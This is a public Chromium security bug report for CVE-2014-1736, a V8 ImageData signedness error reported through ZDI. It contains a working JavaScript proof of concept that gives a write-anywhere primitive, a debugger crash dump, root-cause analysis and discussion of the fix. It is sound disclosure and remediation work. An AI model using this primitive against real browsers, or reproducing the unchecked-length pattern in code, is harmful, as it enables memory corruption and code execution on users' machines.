
Issue metadata

Status: Fixed
Owner:
Closed: Apr 2014
Cc:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




Issue 359802: ZDI-CAN-2245: Google Chrome ImageData Signedness Error Remote Code Execution Vulnerability

Reported by timwillis@google.com, Apr 3 2014 Project Member

Issue description

UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36

Steps to reproduce the problem:
Copy-paste of report to security@google.com from zdi-disclosures@tippingpoint.com (ref 2-6504000003209)

================

ZDI-CAN-2245: Google Chrome ImageData Signedness Error Remote Code Execution Vulnerability

-- CVSS -----------------------------------------

6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P

-- ABSTRACT -------------------------------------

HP's Zero Day Initiative has identified a vulnerability affecting the following products:

  Google Chrome

Email Subject: ZDI-CAN-2245: New Vulnerability Report

Email Recipient: security@google.com

-- VULNERABILITY DETAILS ------------------------

This has to be tested on a 64 bit system. 
Tested on win8.1/64 with Chrome Canary.

The allocation in 64 bit OS in this case happens at 0x7FFF0000:

The following is legit, even if chrome.exe is 32 bit:

There's a signedness error in the handling of the pixel data:

First create a huge pixel image data:

```
// Preamble that was missing from the report as sent (see comment 4):
oContext2d = document.createElement("canvas").getContext("2d");

// Huge ImageData; its pixel backing store is allocated at 0x7FFF0000 in the 32-bit process
oImageData = oContext2d.createImageData(0x10FFFFFF,1);

// Map an absolute 32-bit address to an index into oImageData.data.
// base + index wraps modulo 2^32, so every address becomes reachable from the 0x7FFF0000 base.
function addressToIndex(iAddress) {
return iAddress + (iAddress < 0x7fff0000 ? +0x80010000 : -0x7fff0000);
}

oImageData.data[addressToIndex(0x41414141)] = 0x41; //inject byte anywhere
```

in our case it's going to end up: 0x41414141 + 0x80010000

```
4:061> dd 0x7fff0000
7fff0000  00000000 00000000 00000000 00000000
7fff0010  00000000 00000000 00000000 00000000
7fff0020  00000000 00000000 00000000 00000000
7fff0030  00000000 00000000 00000000 00000000
7fff0040  00000000 00000000 00000000 00000000
7fff0050  00000000 00000000 00000000 00000000
7fff0060  00000000 00000000 00000000 00000000
7fff0070  00000000 00000000 00000000 00000000
4:061> dd 0x80000000
80000000  00000000 00000000 00000000 00000000
80000010  00000000 00000000 00000000 00000000
80000020  00000000 00000000 00000000 00000000
80000030  00000000 00000000 00000000 00000000
80000040  00000000 00000000 00000000 00000000
80000050  00000000 00000000 00000000 00000000
80000060  00000000 00000000 00000000 00000000
80000070  00000000 00000000 00000000 00000000
```

```
(eb4.9dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=00a2ec5c ecx=7fff0000 edx=c400007d esi=c1424141 edi=268080c5
eip=6da23c30 esp=00a2ebd8 ebp=00a2ebe8 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010297
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_child.dll - 
chrome_child!ovly_debug_event+0x510e9c:
6da23c30 88040e          mov     byte ptr [esi+ecx],al      ds:002b:41414141=??
4:061> .sympath SRV*z:\symbolscache*http://msdl.microsoft.com/download/symbols;SRV*z:\symbolscache*http://chromium-browser-symsrv.commondatastorage.googleapis.com
Symbol search path is: SRV*z:\symbolscache*http://msdl.microsoft.com/download/symbols;SRV*z:\symbolscache*http://chromium-browser-symsrv.commondatastorage.googleapis.com
Expanded Symbol search path is: srv*z:\symbolscache*http://msdl.microsoft.com/download/symbols;srv*z:\symbolscache*http://chromium-browser-symsrv.commondatastorage.googleapis.com
4:061> .reload
Reloading current modules
..........................................................
4:061> r
eax=00000041 ebx=00a2ec5c ecx=7fff0000 edx=c400007d esi=c1424141 edi=268080c5
eip=6da23c30 esp=00a2ebd8 ebp=00a2ebe8 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010297
chrome_child!v8::internal::ExternalPixelArray::SetValue+0x88:
6da23c30 88040e          mov     byte ptr [esi+ecx],al      ds:002b:41414141=??
4:061> kvb
ChildEBP RetAddr  Args to Child              
00a2ebe8 6d678245 27108879 01c0c000 c1424141 chrome_child!v8::internal::ExternalPixelArray::SetValue+0x88 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 14771]
00a2ec08 6d678128 00a2ec5c 00a2ed88 c1424141 chrome_child!v8::internal::JSObject::SetElementWithoutInterceptor+0x109 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12712]
00a2ec68 6d677934 00a2eca8 00a2ed88 c1424141 chrome_child!v8::internal::JSObject::SetElement+0x59e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12609]
00a2ecb8 6d66c426 01c0c000 00a2ed88 00a2ed84 chrome_child!v8::internal::Runtime::SetObjectProperty+0x1b2 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\runtime.cc @ 5244]
00a2ecf0 6d66c0da 01c0e63c 00a2ed88 00a2ed84 chrome_child!v8::internal::KeyedStoreIC::Store+0x241 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2024]
00a2ed48 6d66bfc7 00000003 00a2ed88 00a2ed78 chrome_child!v8::internal::__RT_impl_KeyedStoreIC_Miss+0xdb (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2244]
00a2ee14 6d642b9c 1fe2a5c0 1ed30519 34a4789d chrome_child!v8::internal::KeyedStoreIC_Miss+0x16 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2237]
00a2ee5c 6d642a60 00a2eed0 01c0c1a4 01c4f058 chrome_child!v8::internal::Invoke+0x130 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 119]
00a2ee98 6d6e1532 00a2eed0 01c0c000 01c4f058 chrome_child!v8::internal::Execution::Call+0x16d (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 183]
00a2eef0 6d72536f 00a2ef18 01c4f074 00000001 chrome_child!v8::Function::Call+0x102 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\b\build\slave\win\build\src\v8\src\api.cc @ 4191]
00a2ef38 6d724eeb 00a2ef68 01c4f058 01c4f074 chrome_child!WebCore::V8ScriptRunner::callFunction+0x143 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8scriptrunner.cpp @ 136]
4:061> kPn
 # ChildEBP RetAddr  
00 00a2ebe8 6d678245 chrome_child!v8::internal::ExternalPixelArray::SetValue(
			unsigned int index = 0xc1424141, 
			class v8::internal::Object * value = 0x7fff0000)+0x88 [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 14771]
01 00a2ec08 6d678128 chrome_child!v8::internal::JSObject::SetElementWithoutInterceptor(
			class v8::internal::Handle<v8::internal::JSObject> object = class v8::internal::Handle<v8::internal::JSObject>, 
			unsigned int index = 0xc1424141, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>, 
			PropertyAttributes attributes = NONE (0), 
			v8::internal::StrictModeFlag strict_mode = kNonStrictMode (0), 
			bool check_prototype = true, 
			v8::internal::SetPropertyMode set_mode = SET_PROPERTY (0))+0x109 [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12712]
02 00a2ec68 6d677934 chrome_child!v8::internal::JSObject::SetElement(
			class v8::internal::Handle<v8::internal::JSObject> object = class v8::internal::Handle<v8::internal::JSObject>, 
			unsigned int index = 0xc1424141, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>, 
			PropertyAttributes attributes = NONE (0), 
			v8::internal::StrictModeFlag strict_mode = kNonStrictMode (0), 
			bool check_prototype = true, 
			v8::internal::SetPropertyMode set_mode = SET_PROPERTY (0))+0x59e [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12609]
03 00a2ecb8 6d66c426 chrome_child!v8::internal::Runtime::SetObjectProperty(
			class v8::internal::Isolate * isolate = 0x01c0c000, 
			class v8::internal::Handle<v8::internal::Object> object = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> key = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>, 
			PropertyAttributes attr = NONE (0), 
			v8::internal::StrictModeFlag strict_mode = kNonStrictMode (0))+0x1b2 [c:\b\build\slave\win\build\src\v8\src\runtime.cc @ 5244]
04 00a2ecf0 6d66c0da chrome_child!v8::internal::KeyedStoreIC::Store(
			class v8::internal::Handle<v8::internal::Object> object = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> key = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>)+0x241 [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2024]
05 00a2ed48 6d66bfc7 chrome_child!v8::internal::__RT_impl_KeyedStoreIC_Miss(
			class v8::internal::Arguments args = class v8::internal::Arguments, 
			class v8::internal::Isolate * isolate = 0x00000041)+0xdb [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2244]
06 00a2ee14 6d642b9c chrome_child!v8::internal::KeyedStoreIC_Miss(
			int args_length = 3, 
			class v8::internal::Object ** args_object = 0x00a2ed88, 
			class v8::internal::Isolate * isolate = 0x01c0c000)+0x16 [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2237]
07 00a2ee5c 6d642a60 chrome_child!v8::internal::Invoke(
			bool is_construct = true, 
			class v8::internal::Handle<v8::internal::JSFunction> function = class v8::internal::Handle<v8::internal::JSFunction>, 
			class v8::internal::Handle<v8::internal::Object> receiver = class v8::internal::Handle<v8::internal::Object>, 
			int argc = 1, 
			class v8::internal::Handle<v8::internal::Object> * args = 0x00a2efcc, 
			bool * has_pending_exception = 0x00a2eecf)+0x130 [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 119]
08 00a2ee98 6d6e1532 chrome_child!v8::internal::Execution::Call(
			class v8::internal::Isolate * isolate = 0x01c0c000, 
			class v8::internal::Handle<v8::internal::Object> callable = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> receiver = class v8::internal::Handle<v8::internal::Object>, 
			int argc = 1, 
			class v8::internal::Handle<v8::internal::Object> * argv = 0x00a2efcc, 
			bool * pending_exception = 0x00a2eecf, 
			bool convert_receiver = true)+0x16d [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 183]
09 00a2eef0 6d72536f chrome_child!v8::Function::Call(
			class v8::Handle<v8::Value> recv = class v8::Handle<v8::Value>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * argv = 0x00a2efcc)+0x102 [c:\b\build\slave\win\build\src\v8\src\api.cc @ 4191]
0a 00a2ef38 6d724eeb chrome_child!WebCore::V8ScriptRunner::callFunction(
			class v8::Handle<v8::Function> function = class v8::Handle<v8::Function>, 
			class WebCore::ExecutionContext * context = 0x00000041, 
			class v8::Handle<v8::Value> receiver = class v8::Handle<v8::Value>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * info = 0x00a2efcc, 
			class v8::Isolate * isolate = 0x01c0c000)+0x143 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8scriptrunner.cpp @ 136]
0b 00a2ef78 6d724957 chrome_child!WebCore::ScriptController::callFunction(
			class WebCore::ExecutionContext * context = 0x2d404064, 
			class v8::Handle<v8::Function> function = class v8::Handle<v8::Function>, 
			class v8::Handle<v8::Object> receiver = class v8::Handle<v8::Object>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * info = 0x00a2efcc, 
			class v8::Isolate * isolate = 0x01c0c000)+0x110 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\scriptcontroller.cpp @ 180]
0c 00a2efa4 6d72cbd6 chrome_child!WebCore::ScriptController::callFunction(
			class v8::Handle<v8::Function> function = class v8::Handle<v8::Function>, 
			class v8::Handle<v8::Object> receiver = class v8::Handle<v8::Object>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * info = 0x00a2efcc)+0x45 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\scriptcontroller.cpp @ 152]
0d 00a2efd0 6d72c618 chrome_child!WebCore::V8EventListener::callListenerFunction(
			class WebCore::ExecutionContext * context = 0x01c4f058, 
			class v8::Handle<v8::Value> jsEvent = class v8::Handle<v8::Value>, 
			class WebCore::Event * event = 0x01c4f074)+0x82 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8eventlistener.cpp @ 93]
0e 00a2f028 6d72a6b7 chrome_child!WebCore::V8AbstractEventListener::invokeEventHandler(
			class WebCore::ExecutionContext * context = 0x2d404064, 
			class WebCore::Event * event = 0x01bf6100, 
			class v8::Local<v8::Value> jsEvent = class v8::Local<v8::Value>)+0xd7 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8abstracteventlistener.cpp @ 129]
0f 00a2f068 6d72a401 chrome_child!WebCore::V8AbstractEventListener::handleEvent(
			class WebCore::ExecutionContext * context = 0x2d404064, 
			class WebCore::Event * event = 0x01bf6100)+0x139 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8abstracteventlistener.cpp @ 94]
10 00a2f0a0 6d5d0b11 chrome_child!WebCore::EventTarget::fireEventListeners(
			class WebCore::Event * event = 0x01bf6100, 
			struct WebCore::EventTargetData * d = 0x01bfe0c4, 
			class WTF::Vector<WebCore::RegisteredEventListener,1> * entry = 0x033885a0)+0x27c [c:\b\build\slave\win\build\src\third_party\webkit\source\core\events\eventtarget.cpp @ 334]
11 00a2f0dc 6d62b3f9 chrome_child!WebCore::EventTarget::fireEventListeners(
			class WebCore::Event * event = 0x01bf6100)+0xdb [c:\b\build\slave\win\build\src\third_party\webkit\source\core\events\eventtarget.cpp @ 275]
12 00a2f100 6d7568ef chrome_child!WebCore::DOMWindow::dispatchEvent(
			class WTF::PassRefPtr<WebCore::Event> prpEvent = class WTF::PassRefPtr<WebCore::Event>, 
			class WTF::PassRefPtr<WebCore::EventTarget> prpTarget = class WTF::PassRefPtr<WebCore::EventTarget>)+0xbf [c:\b\build\slave\win\build\src\third_party\webkit\source\core\frame\domwindow.cpp @ 1627]
13 00a2f124 6d7567b9 chrome_child!WebCore::DOMWindow::dispatchLoadEvent(void)+0x89 [c:\b\build\slave\win\build\src\third_party\webkit\source\core\frame\domwindow.cpp @ 1598]
4:061> !lmi chrome
Loaded Module Info: [chrome] 
         Module: chrome
   Base Address: 01330000
     Image Name: chrome.exe
   Machine Type: 332 (I386)
     Time Stamp: 5323921f Fri Mar 14 16:34:55 2014
           Size: d7000
       CheckSum: d8fe4
Characteristics: 122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    54, 8d328,   8c728 RSDS - GUID: {DD26A8BC-8557-47F4-9324-A2F94A5753A3}
               Age: 1, Pdb: C:\b\build\slave\win\build\src\build\Release\chrome.exe.pdb
    Symbol Type: DEFERRED - No error - symbol load deferred
    Load Report: no symbols loaded
4:061> !lmi chrome_child
Loaded Module Info: [chrome_child] 
         Module: chrome_child
   Base Address: 6d4f0000
     Image Name: C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_child.dll
   Machine Type: 332 (I386)
     Time Stamp: 532391cb Fri Mar 14 16:33:31 2014
           Size: 1fba000
       CheckSum: 1f84c4f
Characteristics: 2122  perf
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    64, 1d9bcd0, 1d9b0d0 RSDS - GUID: {5F3ACFCB-03EE-43F8-83A5-57EC41874701}
               Age: 1, Pdb: C:\b\build\slave\win\build\src\build\Release\syzygy\chrome_child.dll.pdb
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_child.dll
    Symbol Type: PDB      - Symbols loaded successfully from symbol server.
                 C:\debuggers\sym\chrome_child.dll.pdb\5F3ACFCB03EE43F883A557EC418747011\chrome_child.dll.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [10.0 bld 40219]
    Load Report: private symbols & lines, source indexed 
                 C:\debuggers\sym\chrome_child.dll.pdb\5F3ACFCB03EE43F883A557EC418747011\chrome_child.dll.pdb
4:061> vertarget
Windows 7 Version 9200 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.3.9600.16384 (winblue_rtm.130821-1623)
Machine Name:
Debug session time: Thu Mar 27 06:00:53.077 2014 (GMT-7)
System Uptime: 6 days 23:03:24.556
Process Uptime: 0 days 0:01:20.138
  Kernel time: 0 days 0:00:01.562
  User time: 0 days 0:00:01.437
```

-- CREDIT ---------------------------------------

This vulnerability was discovered by:

   SkyLined working with HP's Zero Day Initiative

-- FURTHER DETAILS ------------------------------

If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.

Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 120 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:

Zero Day Initiative
zdi-disclosures@tippingpoint.com

The PGP key used for all ZDI vendor communications is available from:

     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc

-- INFORMATION ABOUT THE ZDI ---------------------

Established by TippingPoint and acquired by Hewlett-Packard, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

The ZDI is unique in how the acquired vulnerability information is used. The ZDI does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its HP TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.

    http://www.zerodayinitiative.com

-- DISCLOSURE POLICY ----------------------------

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

What is the expected behavior?

What went wrong?
See above

Did this work before? N/A 

Chrome version: 33.0.1750.154  Channel: stable
OS Version: 8.1
Flash Version:
 

Comment 1 by infe...@chromium.org, Apr 3 2014

Cc: a deleted user
Owner: danno@chromium.org

Comment 2 by infe...@chromium.org, Apr 3 2014

Cc: -a deleted user mstarzinger@chromium.org

Comment 3 by infe...@chromium.org, Apr 3 2014

Status: Assigned

Comment 4 by tav...@gmail.com, Apr 3 2014

Missing preamble: oContext2d = document.createElement("canvas").getContext("2d");

Comment 5 by danno@chromium.org, Apr 4 2014

Cc: danno@chromium.org dslomov@chromium.org
Labels: -Pri-2 Pri-1
Owner: jkummerow@chromium.org

Comment 6 by jkummerow@chromium.org, Apr 4 2014

Status: Started
The issue is that v8::Object::SetIndexedPropertiesToPixelData(uint8_t* data, int length) doesn't check whether "length" fits into a Smi, so when we store it as the length property of an external array and read it back out, we get an accidental sign extension, which in turn is interpreted as a very big value by our unsigned bounds check comparisons.
This requires a 32-bit browser on a 64-bit OS to trigger; further it requires a typed array that's fed into V8 via an API call (whereas doing "new Uint8ClampedArray(0x40000000)" in JavaScript is caught by appropriate checks).
I'm working on a fix.
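Worked model of the signedness error described in comment 6 and of the address arithmetic in the original report, added here as an illustration; this is not V8's code and is not from the report. It models a 32-bit V8 Smi as a 31-bit signed payload shifted left by one bit, round-trips the PoC's byte length through that encoding, applies the unsigned bounds comparison the comment describes, and shows why the 0x7FFF0000 base plus the PoC index 0xC1424141 lands on 0x41414141. The byte length 0x43FFFFFC assumes createImageData(0x10FFFFFF, 1) allocates four bytes per pixel; the hardened check at the end mirrors the intent of the fix (reject lengths that do not fit a Smi before they are stored) but is not the actual patch.

```cpp
#include <cstdint>
#include <cstdio>

// Model of a 32-bit V8 Smi: 31-bit signed payload in the upper bits, tag bit 0 clear.
// (Illustrative constants; V8's real definitions live in objects.h.)
static const int32_t kSmiMaxValue = 0x3FFFFFFF;
static const int32_t kSmiMinValue = -0x40000000;

bool fitsInSmi(int32_t v) {
  return v >= kSmiMinValue && v <= kSmiMaxValue;
}

// Storing a Smi: shift the payload up by one. In a 32-bit word the top bit is
// lost when the value does not fit in 31 bits.
uint32_t smiEncode(int32_t v) {
  return static_cast<uint32_t>(v) << 1;
}

// Reading a Smi back: arithmetic shift right, which sign-extends bit 31.
int32_t smiDecode(uint32_t tagged) {
  return static_cast<int32_t>(tagged) >> 1;
}

// The unchecked store/load round trip that comment 6 describes.
int32_t roundTripLength(int32_t length) {
  return smiDecode(smiEncode(length));
}

// Vulnerable bounds check: the index is compared against the (now sign-extended)
// stored length as unsigned, so a negative length reads as a huge limit.
bool vulnerableInBounds(int32_t storedLength, uint32_t index) {
  return index < static_cast<uint32_t>(storedLength);
}

// Address reached by data[index] in a 32-bit process: base + index wraps mod 2^32.
uint32_t effectiveAddress32(uint32_t base, uint32_t index) {
  return base + index;
}

// Hardened creation path (assumed shape, not the V8 patch): reject the length
// before it is ever stored instead of relying on the bounds check afterwards.
bool hardenedAcceptLength(int64_t byteLength) {
  return byteLength >= 0 && byteLength <= kSmiMaxValue;
}

int main() {
  // createImageData(0x10FFFFFF, 1): 0x10FFFFFF pixels * 4 bytes (assumption: 4 bytes per pixel).
  const int32_t pocLength = 0x43FFFFFC;
  const uint32_t pocIndex = 0xC1424141u;  // addressToIndex(0x41414141) from the report
  const uint32_t pocBase = 0x7FFF0000u;   // backing store address from the report

  int32_t stored = roundTripLength(pocLength);
  std::printf("length fits in a Smi: %d\n", fitsInSmi(pocLength));
  std::printf("length after Smi round trip: 0x%08X (%d)\n",
              static_cast<uint32_t>(stored), stored);
  std::printf("vulnerable check passes for index 0x%08X: %d\n",
              pocIndex, vulnerableInBounds(stored, pocIndex));
  std::printf("check against the true length passes: %d\n",
              vulnerableInBounds(pocLength, pocIndex));
  std::printf("effective address of data[index]: 0x%08X\n",
              effectiveAddress32(pocBase, pocIndex));
  std::printf("hardened path accepts length: %d\n", hardenedAcceptLength(pocLength));
  return 0;
}
```

The round trip turns 0x43FFFFFC into 0xC3FFFFFC, a negative int that the unsigned comparison treats as a limit larger than any index the PoC uses, which is exactly the `SetValue(index = 0xc1424141, ...)` frame in the crash dump above.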

Comment 7 by jkummerow@chromium.org, Apr 4 2014

Status: Fixed
Fixed in https://code.google.com/p/v8/source/detail?r=20519, will likely roll into Chromium on Monday.

Comment 8 by ClusterFuzz, Apr 4 2014

Project Member
Labels: -Restrict-View-SecurityTeam Merge-Triage Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 9 by jkummerow@chromium.org, Apr 4 2014

Status: Started
Actually, it's not quite fixed yet. It seems I was confused. We need to check in v8::Uint8ClampedArray::New and friends.

Comment 10 by infe...@chromium.org, Apr 4 2014

Labels: -OS-Windows -Merge-Triage -Restrict-View-SecurityNotify OS-All Security_Impact-Beta Restrict-View-SecurityTeam Security_Impact-Stable Security_Severity-High

Comment 11 by ClusterFuzz, Apr 4 2014

Project Member
Labels: M-34

Comment 12 by dslomov@chromium.org, Apr 5 2014

Proposed fix https://codereview.chromium.org/225983005 trades vulnerability for crash. This is a simple and easily back-mergeable fix.
The proper fix should throw from v8::XXXArray::New functions, returning empty handles.
However this needs also modifications in Blink:
1. In bindings to handle these functions throwing
2. In implementation of createImageData, throwing at creation time when the backing store for image data is too big.

Comment 13 by dslomov@chromium.org, Apr 7 2014

Cc: -dslomov@chromium.org jkummerow@chromium.org
Owner: dslomov@chromium.org
Fix landed in https://code.google.com/p/v8/source/detail?r=20525

Comment 14 by infe...@chromium.org, Apr 7 2014

Status: Fixed

Comment 15 by dslomov@chromium.org, Apr 8 2014

Labels: Merge-Requested

Comment 16 by dxie@chromium.org, Apr 9 2014

Labels: -Merge-Requested Merge-Approved

Comment 17 by scarybea...@gmail.com, Apr 10 2014

Cc: berendja...@gmail.com

Comment 18 by scarybea...@gmail.com, Apr 13 2014

Labels: ZDI-CAN-2245
Attaching a couple of files from an encrypted ZIP that came along with the original report.
ZDI-CAN-2245.pcap (1.5 KB)
repro (1).html (510 bytes)

Comment 19 by dslomov@chromium.org, Apr 17 2014

Labels: -Merge-Approved Merge-Merged
version: 3.24.35.33
branch: branches/3.24
svn revision: 20860
patches: r20525

Comment 20 by timwillis@chromium.org, Apr 21 2014

Cc: zdi.disc...@gmail.com
+cc original reporter.

Comment 21 by scarybea...@gmail.com, Apr 25 2014

Labels: Release-1-M34
The version of v8 mentioned in #c19 shipped with M34 patch 1: http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html

Tagging.

Comment 22 by timwillis@chromium.org, Apr 26 2014

Labels: CVE-2014-1736

Comment 23 by timwillis@chromium.org, Apr 26 2014

Credit for this report will be added to the release notes at  http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html on Monday April 28.

Comment 24 by timwillis@chromium.org, Apr 28 2014

Release notes updated adding in this bug. Note that this bug is still marked as "Restrict-View-SecurityTeam". Once the update reaches all our users, this permission will be removed and the bug details will become public.

Comment 25 by berendja...@gmail.com, Jul 9 2014

Release blog says this was supposed to be fixed in 34.0.1847.131, yet it still affects my version 35.0.1916.153 m, am I missing something?

Comment 26 by jkummerow@chromium.org, Jul 9 2014

Looks like this has been fixed at the beginning of the M36 development cycle, and never been merged back to M35 (but was merged to M34). Oops.

It's probably too late to do anything now, as M36 should hit the stable channel soon, and I don't think there'll be another M35 refresh before then.

Comment 27 Deleted

Comment 28 by berendja...@gmail.com, Jul 9 2014

I'll delay publishing details some more then :)

Comment 29 by ClusterFuzz, Jul 14 2014

Project Member
Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.

Comment 30 by ClusterFuzz, Feb 2 2016

Project Member
Labels: -Security_Impact-Beta

Comment 31 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 32 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 33 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 34 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
